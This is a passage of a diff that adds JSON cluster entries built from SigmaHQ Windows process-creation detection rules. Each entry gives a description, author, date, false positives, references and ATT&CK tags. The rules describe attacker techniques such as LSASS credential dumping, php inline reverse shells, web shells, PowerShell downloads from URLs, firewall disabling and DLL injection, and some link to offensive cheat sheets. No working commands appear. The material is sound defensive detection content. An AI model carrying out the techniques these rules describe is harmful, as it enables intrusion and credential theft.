+ "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_run_locations.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2013-05-002", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" + ] + }, + "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "value": "Suspicious Process Start Locations" + }, + { + "description": "Payloads may be compressed, archived, or encrypted in order to avoid detection", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_run_from_zip.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_from_zip.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "1a70042a-6622-4a2b-8958-267625349abf", + "value": "Run from a Zip File" + }, + { + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sdbinst_shim_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.011" + ] + }, + "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", + "value": "Possible Shim Database Persistence via sdbinst.exe" + }, + { + "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_php_inline_command_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", + "https://www.php.net/manual/en/features.commandline.php", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "value": "Php Inline Command Execution" + }, + { + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_raspberry_robin_single_dot_ending_file.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "value": "Raspberry Robin Dot Ending File" + }, + { + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" + ], + "filename": "proc_creation_win_susp_rar_flags.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/bash/rar.html", + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", + "value": "Rar Usage with Password and Compression Level" + }, + { + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_no_dll.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574", + "attack.execution" + ] + }, + "uuid": "50919691-7302-437f-8e10-1fe088afa145", + "value": "Regsvr32 Command Line Without DLL" + }, + { + "description": "Attempts to detect system changes made by Blue Mockingbird", + "meta": { + "author": "Trent Liffick (@tliffick)", + "creation_date": "2020/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mal_blue_mockingbird.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112", + "attack.t1047" + ] + }, + "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "value": "Blue Mockingbird" + }, + { + "description": "Detects the execution of whoami with suspicious parents or parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/12", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_whoami_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "value": "Whoami Execution Anomaly" + }, + { + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_remote_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "value": "Suspicious Regsvr32 Execution From Remote Share" + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_lpe_cve_2021_41379.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", + "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379" + }, + { + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/06", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_add_user_remote_desktop.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" + ] + }, + "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "value": "Suspicious Add User to Remote Desktop Users Group" + }, + { + "description": "Detects suspicious DACL modifications that can be used to hide services or make them unstopable", + "meta": { + "author": "Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_dacl_modification.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ] + }, + "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "value": "Suspicious Service DACL Modification" + }, + { + "description": "Detects a Powershell process that contains download commands in its command line string", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", + "value": "PowerShell Download from URL" + }, + { + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysnative.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysnative.yml" + ], + "tags": [ + "attack.t1055" + ] + }, + "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "value": "Process Creation Using Sysnative Folder" + }, + { + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_susp_grpconv.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1526833181831200770", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "value": "Suspicious GrpConv Execution" + }, + { + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cglyer/status/1182389676876980224", + "https://twitter.com/cglyer/status/1182391019633029120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "value": "WMI Backdoor Exchange Transport Agent" + }, + { + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_rurat.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" + ] + }, + "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5", + "value": "Execution of Renamed Remote Utilities RAT (RURAT)" + }, + { + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "filename": "proc_creation_win_wpbbin_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/wpbbin.html", + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ] + }, + "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145", + "value": "UEFI Persistence Via Wpbbin - ProcessCreation" + }, + { + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "meta": { + "author": "Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Particular web applications may spawn a shell process legitimately" + ], + "filename": "proc_creation_win_webshell_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1190" + ] + }, + "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", + "value": "Shells Spawned by Web Servers" + }, + { + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2021/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" + ] + }, + "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "value": "Mavinject Inject DLL Into Running Process" + }, + { + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msiexec_install_remote.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "value": "Suspicious Msiexec Quiet Install From Remote Location" + }, + { + "description": "Attackers can use explorer.exe for evading defense mechanisms", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "creation_date": "2020/10/05", + "falsepositive": [ + "Legitimate explorer.exe run from cmd.exe" + ], + "filename": "proc_creation_win_susp_explorer.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", + "value": "Proxy Execution Via Explorer.exe" + }, + { + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hktl_createminidump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "value": "CreateMiniDump Hacktool" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/12/07", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_netsh_discovery_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_discovery_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "value": "Suspicious Netsh Discovery Command" + }, + { + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "meta": { + "author": "@ROxPinTeddy, Nasreddine Bencherchali", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "proc_creation_win_advanced_ip_scanner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ] + }, + "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", + "value": "Advanced IP Scanner" + }, + { + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "meta": { + "author": "Elastic (idea), Tobias Michalski", + "creation_date": "2022/05/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ntlmrelay.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/med0x2e/status/1520402518685200384", + "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", + "value": "Suspicious NTLM Authentication on the Printer Spooler Service" + }, + { + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_get_clipboard.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "value": "PowerShell Get-Clipboard Cmdlet Via CLI" + }, + { + "description": "Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/30", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_expand_cabinet_files.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "9f107a84-532c-41af-b005-8d12a607639f", + "value": "Cabinet File Expansion" + }, + { + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_schtasks_delete_all.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "value": "Delete All Scheduled Tasks" + }, + { + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "meta": { + "author": "Florian Roth (rule), MSTI (query)", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_chopper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ] + }, + "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "value": "Chopper Webshell Process Pattern" + }, + { + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "meta": { + "author": "@41thexplorer, Microsoft Defender ATP", + "creation_date": "2019/11/12", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_apt_tropictrooper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "value": "TropicTrooper Campaign November 2018" + }, + { + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mofcomp_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", + "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", + "value": "Suspicious Mofcomp Execution" + }, + { + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "meta": { + "author": "Florian Roth, Markus Neis", + "creation_date": "2020/02/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" + ] + }, + "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb", + "value": "Winnti Malware HK University Campaign" + }, + { + "description": "Detects netsh commands that turns off the Windows firewall", + "meta": { + "author": "Fatih Sirin", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_susp_netsh_firewall_disable.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", + "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", + "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004", + "attack.s0108" + ] + }, + "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", + "value": "Firewall Disabled via Netsh" + }, + { + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_winrm_awl_bypass.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", + 